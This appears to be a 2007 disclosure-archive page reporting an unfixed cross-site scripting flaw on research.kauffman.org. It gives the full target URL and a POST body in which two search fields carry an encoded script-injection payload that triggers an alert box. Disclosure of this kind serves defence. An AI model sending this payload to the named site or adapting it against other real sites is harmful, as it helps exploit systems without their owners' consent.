research.kauffman.org cross-site-scripting (XSS) Vulnerability

Advertisements:

Security researcher Uber0n, has submitted on 05/10/2007 a cross-site-scripting (XSS) vulnerability affecting research.kauffman.org, which at the time of submission ranked 277358 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 06/10/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Date submitted: 05/10/2007

Date published: 06/10/2007

Fixed? Mail us!

Status:

UNFIXED

Author: Uber0n

Domain: research.kauffman.org

Category: XSS

Pagerank: 277358

URL: http://research.kauffman.org/cwp/appmanager/research/researchDesktop?_nfpb=true&_pageLabel=research_
searchOrBrowseResults&basicSearchOrBrowseControllerPortlet_resultsPage_actionOverride=/portlets/basi
cSearchOrBrowse/basicSearchOrBrowseAction&_nfls=false

POST: searchText=%22%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&selectedDatabaseNames=event&submit.x=11& submit.y=14&start=&stop=&searchPerformed=true&_nfls=false&addCategoryPath=&removeCategoryPath=&selec tedBranches=&resultsPerPage=&searchContextText=&pageNum=&maxResults=&mode=search&clickedButton=searc h&clickedButton=search&sortBy=&browseSearch=false&relatedDocId=&disciplineCSVs=&primaryAuthor=&publi cation=&isbnNumber=&yearFrom=&yearTo=&kauffmanOnly=&summaries=on&searchType=&booleanText=&conceptTex t=&selectedType=&dateType=&beginDate=&endDate=&selectedMonth=&altSearchText=%22%27%3E%3Cscript%3Eale rt%281%29%3C%2Fscript%3E&fromAdvSearch=false&typeCSVs=&searchFieldOne=&searchFieldValueOne=&andOrNot One=&searchFieldTwo=&searchFieldValueTwo=&andOrNotTwo=&searchFieldThree=&searchFieldValueThree=&andO rNotThree=&searchFieldFour=&searchFieldValueFour=&myListId=&myListIndex=&metaField=&metaValue=&docId sList=&docIdsAreRef=&shadowSearchText=

Click here to view the mirror

XSS Attacks
Cross Site Scripting Exploits and Defense

Website Fraud Loss Prevention